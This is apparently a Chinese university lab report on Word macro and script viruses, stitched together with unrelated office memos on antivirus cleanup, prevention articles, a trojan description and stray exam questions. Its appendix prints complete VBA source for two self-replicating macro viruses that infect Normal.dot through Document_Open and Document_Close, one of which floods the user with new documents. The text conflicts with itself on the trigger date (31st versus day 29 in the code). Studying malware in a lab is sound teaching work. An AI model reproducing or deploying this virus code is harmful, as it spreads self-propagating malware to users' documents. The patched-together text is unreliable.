下载文档原格式
西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级: 学生姓名: 学号(班内序号): 2014 年 5 月 14 日——————————————————————————装订线————————————————————————————————报告份数:脚本及恶意文件病毒1.场景描述在虚拟机系统当中建立相关脚本病毒的文件,以及进行相关操作。
备注:所用工具(D盘-->攻防工具包-->脚本及恶意文件病毒:创建.txt、拷贝.txt、删除.txt、修改.txt)2.实验目的1).了解脚本及恶意网页的运行环境,运行平台,语言基础及传播手段2).掌握脚本及恶意网页的基本防范方法和手工处理技巧3).通过实验中对典型脚本病毒及恶意网页的分析,掌握判断未知脚本病毒及其处理能力3.需求分析通过在一些网页上写一些隐藏的危害代码来达到目的,代码隐藏得越深,越难发现。
我们得通过一些常见的隐藏手段来学习发现危害代码。
4.技术分析计算机脚本病毒同样具有计算机病毒通常都具有的所有特征,如自我复制性、传播性、潜伏性、破坏性等。
计算机脚本病毒的产生得益于操作系统和应用系统对脚本技术的无节制的滥用。
通常,在任何一个操作系统和应用系统中都存在一定的安全机制,但为了实现对系统的控制和易用性,这些安全机制对脚本程序的行为都缺乏控制,也就是对脚本开发语言的使用行为缺乏控制。
脚本语言的前身实际上就是DOS系统下的批处理文件,只是批处理文件和现在的脚本语言相比简单了一些。
脚本的应用是对应用系统的一个强大的支撑,需要一个运行环境。
现在比较流行的脚本语言有:UNIX/Linux Shell,Pert,VBScript,JavaScript,JSP,PHP等。
由于现在流行的脚本计算机病毒大都是利用JavaScript和VBScript脚本语言编写,因此这里重点介绍一下这两种脚本语言。
1).JavaScript和VBScript脚本语言介绍JavaScript是一种解释型的、基于对象的脚本语言,是Microsoft公司对ECMA262语言规范的一种实现。
关于Office文档中宏病毒的处理方法
Office文档是目前使用最多、最常见的办公文档(它包含Word文档,Excel文档,PPT文档等),由于Office 软件默认的安全级别为中,所以Office文档成了病毒攻击的目标,目前有许多Office文档病毒,最近校园网出现的宏病毒传播,成了大家头疼的一件事,现就处理方法介绍如下,请各老师参考与分享。
1.宏病毒的分析
Office文档中的宏是Office中最高级别的部分,平时大家很少用到,它能把繁重的工作简单化,默认的安全级别为中,宏病毒正是利用这一点通过网络、U盘等进行传播,中毒的电脑明显反应变慢,Office文档大小在不断变化,有的成倍增加,一个小小的电子表格就有2M之多,使用十分困难。
2.感染后的特征
感染后的Office文档,除大小变大外,每次打开都要求启用宏,不启用便不能打开Office文档,或者打开了,全是空白,如果使用杀毒软件,则会把文档删除,给用户带来许多麻烦。
Office软件运行缓慢,电脑经常死机等。
由于现在(QQ、126)邮件系统都集成防毒软件,在发送邮件时上传感染后的Office文档,邮件系统会提示文件发送失败。
3.处理方法
方法一:
点击下载“Office病毒专杀.zip”工具,解压后安装,界面如下:
点击全盘杀毒,即可对电脑中的Office病毒进行全面查杀。
方法二:点击下载安装“新版360杀毒软件.rar”,启动新增Office宏病毒免疫功能。
宏病毒折叠编辑本段基本概念宏病毒是⼀种寄存在⽂档或模板的宏中的计算机病毒。
⼀旦打开这样的⽂档,其中的宏就会被执⾏,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有⾃动保存的⽂档都会“感染”上这种宏病毒,⽽且如果其他⽤户打开了感染病毒的⽂档,宏病毒⼜会转移到他的计算机上。
折叠编辑本段主要特点宏病毒是针对微软公司的⽂字处理软件Word编写的⼀种病毒。
微软公司的字处理软件是最为流⾏的编辑软件,并且跨越了多种系统平台,宏病毒充分利⽤了这⼀点得到恣意传播。
宏病毒作为⼀种新型病毒有其特点与共性。
折叠 1.传播极快Word宏病毒通过.DOC⽂档及.DOT模板进⾏⾃我复制及传播,⽽计算机⽂档是交流最⼴的⽂件类型。
⼈们⼤多重视保护⾃⼰计算机的引导部分和可执⾏⽂件不被病毒感染,⽽对外来的⽂档⽂件基本是直接浏览使⽤,这给Word宏病毒传播带来很多便利。
特别是Internet⽹络的普及,Email的⼤量应⽤更为Word宏病毒传播铺平道路。
根据国外较保守的统计,宏病毒的感染率⾼达40%以上,即在现实⽣活中每发现100个病毒,其中就有40多个宏病毒,⽽国际上普通病毒种类已达12000多种。
宏病毒的传播折叠 2.制作、变种⽅便以往病毒是以⼆进制的计算机机器码形式出现,⽽宏病毒则是以⼈们容易阅读的源代码宏语⾔WordBasic形式出现,所以编写和修改宏病毒⽐以往病毒更容易。
世界上的宏病毒原型⼰有⼏⼗种,其变种与⽇俱增,追究其原因还是Word的开放性所致。
现在的Word病毒都是⽤WordBasic 语⾔所写成,⼤部分Word病毒宏并没有使⽤Word提供的Execute-Only处理函数处理,它们仍处于可打开阅读修改状态。
所有⽤户在Word⼯具的宏菜单中很⽅便就可以看到这种宏病毒的全部⾯⽬。
当然会有“不法之徒”利⽤掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变,⽴即就⽣产出了⼀种新的宏病毒,甚⾄⽐原病毒的危害更加严重。
宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。
并且会驻留在Normal面板上6,宏病毒在.DOC文档、.DOT模板中是以BFF(BinaryFileFormat)格式存放,这是一种加密压缩格式,每种Word版本格式可能不兼容。
木马病毒“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。
植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服务端的电脑。
运行了木马程序的服务端以后,会产生一个有着容易迷惑用户的名称的进程,暗中打开端口,向指定地点发送数据(如网络游戏的密码,即时通信软件密码和用户上网密码等),黑客甚至可以利用这些打开的端口进入电脑系统。
特洛伊木马程序不能自动操作,特洛伊木马有两种,universal的和transitive的,universal就是可以控制的,而transitive是不能控制,刻死的操作。
危害58 ASCII码采用____C__位二进制编码。
A、6B、7 C 8 D 9139 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。
多选题5、常见的信息采集工具有哪些扫描仪:(纸制材料扫描成图片,利用OCR软件识别为文字)照相机:主要用于采集图像信息;摄像机:主要用于采集视频信息;录音设备:主要用于采集音频信息(麦克风、录音笔、Mp3);计算机:采集来自光盘网络等多种类型的信息至计算机中10如何缩小搜索范围A搜索关键词提练B细化搜索条件C用好逻辑命令D搜索逻辑命令通常是指布尔命令“AND”、“OR”、“NOT”及与之对应的“+”、“-”等逻辑符号命令。
宏病毒处理方法宏病毒处理方法宏病毒处理方法各位领导及同事:近期各部门Office 软件都发现宏病毒,宏病毒会自动更改EXECL 文件的安全性(将之自动调为低) 并在发作后毁坏感染的office 文件,严重影响大家的日常工作。
现将处理方法简单介绍如下(该处理办法主要针对office2021):一:随本文件一起打包有“金山毒霸宏病毒专杀工具”,双击“金山毒霸宏病毒专杀工具”自动进行安装,安装后界面如下:点击全盘杀毒,即可对电脑中的Office 病毒进行全面查杀。
(如果计算机上装有WPS ,金山毒霸宏病毒专杀则不能查杀)二:1、随本文件一起打包有最新360安装文件,双击“新版360杀毒软件”进行安装(注意:在安装360安装包前需将电脑以前安装过的杀毒软件卸载,卸载后重启电脑再安装最新版360),新版360在病毒免疫中启动新增Office 宏病毒免疫功能。
2、在杀毒软件右上角,打开设置,并按照下图设置杀毒软件参数,进行设置:3、在设置中打开“病毒扫描设置”,其中“需要扫描文件类型”选中“扫描所有文件、进入压缩包查毒”。
4、设置好后,更新杀毒软件,如下图,点击软件右上角“升级”,在打开的界面中进行自动升级。
在反复确认升级完成后,再选择“全盘扫描”,然后查毒。
三:查杀完宏病毒后打开excel 表格文件设置,将宏的安全性设置为高“工具——宏——安全性” 如果宏的安全性不能设置为高,则需要对该文件点击右键,单独进行一次360杀毒和“金山毒霸宏病毒专杀工具”杀毒,再将“宏”安全性如下图调到“中”,文件打开后若出现“禁用宏”或“启用宏”选项,则选择“启用宏”。
(文件只需进行一次查杀即可)希望各部门严格按照上述方法对公司办公电脑及个人电脑进行office 宏病毒查杀。
海螺其他兄弟公司也有宏病毒出现,请大家在接受邮件及使用移动存储设备之前先使用上述两个软件进行查杀后再打开,以免出现重复感染。
Office如何有效预防宏病毒简介宏病毒是一种利用Microsoft Office软件中的宏功能传播的恶意软件。
宏病毒可以通过恶意宏代码来执行各种破坏行为,如破坏、删除或篡改文件。
在工作环境中,使用Microsoft Office软件是不可避免的。
然而,有效预防宏病毒的传播变得尤为重要。
本文将介绍一些有效的预防宏病毒的方法,帮助您保护您的数据和计算机安全。
方法一:启用安全设置Microsoft Office软件提供了一些内置的安全设置,可以帮助有效预防宏病毒的传播。
以下是一些重要的安全设置:1. 禁用自动宏运行默认情况下,Office软件启用自动宏运行。
禁用自动宏运行可以防止恶意宏在打开文档时自动执行。
要禁用自动宏运行,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“禁用所有宏,并禁用通知”选项。
2. 禁用宏如果您不需要使用宏功能,禁用宏是一种有效的预防宏病毒的办法。
要禁用宏,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“不允许任何宏运行”选项。
3. 启用受信任的位置有时,您可能需要运行特定的宏或从受信任的位置打开文档。
为了更好地控制宏的运行,可以将受信任的位置添加到Office软件的信任中心。
要启用受信任的位置,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“受信任的位置”中,点击“添加新位置”按钮。
方法二:保持软件升级定期升级Microsoft Office软件是预防宏病毒的另一个重要步骤。
每个Office升级都包含了最新的安全补丁和修复程序,可以提供额外的安全保障。
要确保软件始终保持最新状态,可以按照以下步骤操作:•打开Office软件,点击“文件”菜单。
Office多媒体网络病毒副本随着互联网的发展,网络病毒也越来越多种多样,其中一种较为常见的就是Office多媒体网络病毒副本。
这种病毒通过Office文档传播,所以在工作和学习中使用Office软件的人都需要加强防范。
本文将从以下几个方面介绍该病毒:病毒的原理、传播方式、危害以及防范方法。
病毒的原理Office多媒体网络病毒副本属于一种宏病毒。
宏病毒是指利用Office软件内置的自动化功能攻击Office文档的病毒。
这种病毒通常嵌入到Office文件的宏代码中,利用用户打开文档后自动启动宏代码,实现病毒的植入和传播。
传播方式Office多媒体网络病毒副本的传播方式主要有以下几种:•电子邮件传播。
攻击者利用电子邮件向用户发送带有病毒的Office 文档,用户下载和打开文档后,病毒就会利用宏代码和OLE对象绕过安全防御系统,并在用户电脑上植入恶意代码。
•网络共享传播。
攻击者利用局域网或互联网上的网络共享功能,将带有病毒的Office文档放到共享文件夹中,其他用户下载和打开文档后同样会感染该病毒。
•恶意下载传播。
攻击者利用一些安全漏洞或软件漏洞,将病毒隐藏在一些下载软件中,用户安装及使用后就会被感染该病毒。
危害Office多媒体网络病毒副本具有以下危害:•植入恶意程序。
该病毒可以向用户电脑上植入各种恶意程序,如木马、勒索病毒等,从而获取用户的敏感信息,造成经济损失和个人信息泄露。
•破坏系统安全。
该病毒会破坏系统安全性,使得用户的电脑在连接互联网时,易受到黑客攻击而失去安全保障。
•操作失败。
该病毒还会导致用户的各项操作失效,如无法打开电脑上的文件、无法连接打印机等,进而,严重影响用户的工作和学习效率。
防范方法Office多媒体网络病毒副本虽然危害巨大,但是只要用户做好以下防范策略,就可以有效避免病毒的感染:•不轻易打开不熟悉或可疑邮件的附件,尤其是Office文档。
•安装杀毒软件并定期更新病毒库。
•确定下载软件的安全性,不要下载任何不安全的下载软件。
OFFICE宏病毒查杀方案OFFICE宏病毒查杀方案彻底查杀本次OFFICE宏病毒,需通过以下步骤解决。
一、清除用户电脑上存在的病毒。
(4月16日11:30-13:00进行)二、安装或升级防毒软件,避免再次感染。
(4月16日11:30-13:00进行)具体说明如下:一、清除用户电脑上存在的病毒。
1、使用专杀工具“MacroKiller”进行杀毒。
图1MacroKiller专杀工具2、使用“Cleanmacro”office病毒专杀工具,进行杀毒。
图2“Cleanmacro”office病毒专杀第一文库网工具二、安装或升级防毒软件,避免再次感染。
1、安装ESETNOD32Antivirus4杀毒软件或者免费的360杀毒软件,注意2种杀毒软件不可以安装在同一台电脑。
2、建议已经安装ESETNOD32的用户先升级软件和病毒库,再进行查杀。
(具体操作如下图3、4、5)3、建议已经安装360的用户先升级软件和病毒,再进行查杀。
(具体操作如下图6、7、8、9)4、完成以上步骤以后,即可拥有对本次OFFICE宏病毒的防御能力。
5、培养良好的计算机使用习惯,防止病毒感染。
建议用户接收到文件后,先使用杀毒软件对文件进行查杀后再打开接收到的文件,尽量避免直接打开接收到的'文件,减少病毒感染的机率。
例1、通过OA打开文件时,建议先另存,再杀毒,然后再打开。
例2、通过RTX或其他即时通讯软件接收到的文件或程序,先另存再杀毒,然后再打开或运行;培养定期对电脑进行全盘杀毒的习惯,防止感染病毒。
图3ESETNOD32Antivirus4杀毒软件图4升级到4.2.71.2以上版本可以查杀本次OFFICE宏病毒图5ESETNOD32发现病毒后会自动隔离病毒文件,达到防御的目的。
如必须查看该文档请对方先通过专杀工具查杀后再发送。
图6360杀毒软件需升级到3.0.0.3031以上版本图7设置360杀毒软件的“实时防护设置”图8手动杀毒,鼠标单击右键选择相应的杀毒软件手动查杀病毒。
西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级: 学生姓名: 学号(班内序号): 2014 年 5 月 28 日——————————————————————————装订线————————————————————————————————报告份数:实验宏病毒1.场景描述在虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作。
宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt)备注:实验工具(D盘-->攻防工具包-->宏病毒:Copy.txt、TaiWanNo1.txt)2.实验目的(1)演示宏的编写(2)说明宏的原理及其安全漏洞和缺陷(3)理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识3.需求分析宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
因为Microsoft Word几乎已经成为目前全世界办公文档的事实工业标准,其影响是全球范围的。
Word文件的交换是目前办公室数据交流和传送的最通常的方式之一,而且该病毒能跨越多种平台,并且针对数据文档进行破坏,因此具有极大地危害性。
所以,必须要掌握如何预防和清除宏病毒,让损失减少。
4.技术分析Word的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录等)。
模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是类似的。
Word提供了几种常见文档类型的模板,如备忘录、报告和商务信件。
您可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。
一般情况下,Word自动将新文档基于缺省的公用模板(Normal.dot)。
可以看出,模板在建立整个文档中所起的作用,作为基类,文档继承模板的属性,包括宏、菜单、格式等。
Word处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。
每一种动作其实都对应着特定的宏命令,如存文件与FileSave相对应、改名存文件对应着FileSaveAS、打印则对应着Fil_ePrint等。
Word打开文件时,它首先要检查是否有AutoOpen宏存在,假如有这样的宏,Word就启动它,除非在此之前系统已经被“取消宏(Disable Auto Macros)”命令设置成宏无效。
当然,如果AutoClose宏存在,则系统在关闭一个文件时,会自动执行它。
通常,、AutoExec、AutoExit和AutoNew等),或者是一个以上的标准宏,如FileOpen、FileSaveAs等。
如果某个.doc文件感染了这类Word宏病毒,则当Word LX行这类自动宏时,实际上就是运行了病毒代码。
由自动宏和/或标准宏构成的宏病毒,其内部都具有把带病毒的宏移植(复制)到通用宏的代码段,也就是说宏病毒通过这种方式实现对其他文件的传染。
当Word系统退出时,它会自动地把所有通用宏(当然也包括传染进来的病毒宏)保存到模板文件中(即*.DOT 文件,通常为NORMAL.DOT),当Word系统再次启动时,它又会自动地把所有通用宏(包括病毒宏)从模板中装人。
如此这般,一旦Word系统遭受感染,则以后每当系统进行初始化时,系统都会随着NORMAL.DOT的装人而成为带毒的Word系统,继而在打开和创建任何文档时感染该文档。
一旦病毒宏侵入Word系统,它就会替代原有的正常宏,如FileOpen、FileSave、FileSaveAs和FilePrint等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。
当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。
宏病毒在感染一个文档时,首先要把文档转换成模板格式,然后把所有病毒宏(包括自动宏)复制到该文档中。
被转换成模板格式后的染毒文件无法转存为任何其他格式。
含有自动宏的宏病毒染毒文档,当被其他计算机的Word系统打开时,便会自动感染该计算机。
例如,如果病毒捕获并修改了FileOpen,那么,它将感染每一个被打开的Word文件。
宏病毒主要寄生于AutoOpen、AutoClose和AutoNew 3个宏中,其引导、传染、表现或破坏均通过宏指令来完成的。
宏指令是用宏语言WORDBASIC编写的,宏语言提供了许多系统级底层功能调用,因此,宏病毒利用宏语言实现其传染、表现或破坏的目的。
目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果Word系统在读取一个染毒文件时遭受感染,则其后所有新创建的 DOC 文件都会被感染。
Word宏病毒几乎是唯一可跨越不同硬件平台而生存、传染和流行的一类病毒。
如果说宏病毒还有什么局限性的话,就是这些病毒必须依赖某个可受其感染的系统,如微软的Word或Excel,否则这些宏病毒便成了无水之鱼。
5.实验步骤及结果1).打开word2003,在->工具->宏->安全性中,将安全级别设置为低,在可靠发行商选项卡中,选信任任何所有安装的加载项和模板,选择信任visual basic项目的访问。
2).自我复制功能:(1).在宏编辑器的project->Microsoft Word对象->ThisDocument中(或快捷方式ALT+F11),输入源代码(copy.txt),保存。
(2).运行宏,弹出“中毒了”的文本格。
(3).新建文档,打开,关闭,也会显示“中毒了”。
(4).把中毒的文档里的宏全部删除,就能消除宏病毒了。
3).类台湾一号病毒(1).把日期设置为31号,,因为该病毒在特定时间才会发作。
(2).在宏编辑器的project->Microsoft Word对象->ThisDocument中(或快捷方式ALT+F11),输入源代码(taiwanNO1.txt),保存。
(3).观察病毒运行后的效果,当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是31日,,然后跳出一个对话框,要求用户进行一次心算游戏,如果用户计算正确,就会新建一个文档,跳出字幕如下:“何谓宏病毒,答案:我就是……,如何预防宏病毒,答案:不要看我……”。
如果计算错误,新建20个写有“宏病毒”字样的word文档,然后再一次进行心算游戏,总共进行3次,然后跳出程序,关闭文档的时候也会进行同样地询问。
计算正确:计算错误:4).清除宏病毒:进入宏编辑器,清空ThisDocument中的源代码并保存,逐一关闭文档,便可清除宏病毒。
附:1.copy.txt源代码:Sub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOpitons.SaveNormaPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) <> "'Micro-Virus" Then.DeleteLine 1, .CountOflines.InsertLines 1, Ourcode.ReplaceLine2 , "SubDocument_Close()"If ThisDocument = nomaltemplate Then.replaceline 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "中毒了"End Sub2.台湾一号源代码:'moonlightDim nm(4)Sub Document_Open()'DisableInput 1Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = ActiveDocument.VBProject.VBComponents(1).CodeModule End IfWith hostIf .Lines(1, 1) <> "'moonlight" Then.DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 3, "Sub Document_Close()"If ThisDocument = NormalTemplate Then.ReplaceLine 3, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithCount = 0If Day(Now()) = 29 Thentry:On Error GoTo trytest = -1con = 1tog$ = ""i = 0While test = -1For i = 0 To 4nm(i) = Int(Rnd() * 10)con = con * nm(i)If i = 4 Thentog$ = tog$ + Str$(nm(4)) + "=?"GoTo begEnd Iftog$ = tog$ + Str$(nm(i)) + "*"Next ibeg:Beepans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus") If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) ThenDocuments.AddSelection.Paragraphs.Alignment = wdAlignParagraphCenterBeepWith Selection.Font.Name = "细明体".Size = 16.Bold = 1.Underline = 1End WithSelection.InsertAfter Text:="何谓宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfter Text:="答案:"Selection.Font.Italic = 1Selection.InsertAfter Text:="我就是......"Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic = 0BeepSelection.InsertAfter Text:="如何预防宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfter Text:="答案:"Selection.Font.Italic = 1Selection.InsertAfter Text:="不要看我......"GoTo outElseCount = Count + 1For j = 1 To 20BeepDocuments.AddNext jSelection.Paragraphs.Alignment = wdAlignParagraphCenterSelection.InsertAfter Text:="宏病毒"If Count = 2 Then GoTo outGoTo tryEnd IfWendEnd Ifout:End Sub指导教师评语:实 验 成 绩:指导(辅导)教师 :——————————————————————————装 订 线————————————————————————————————。
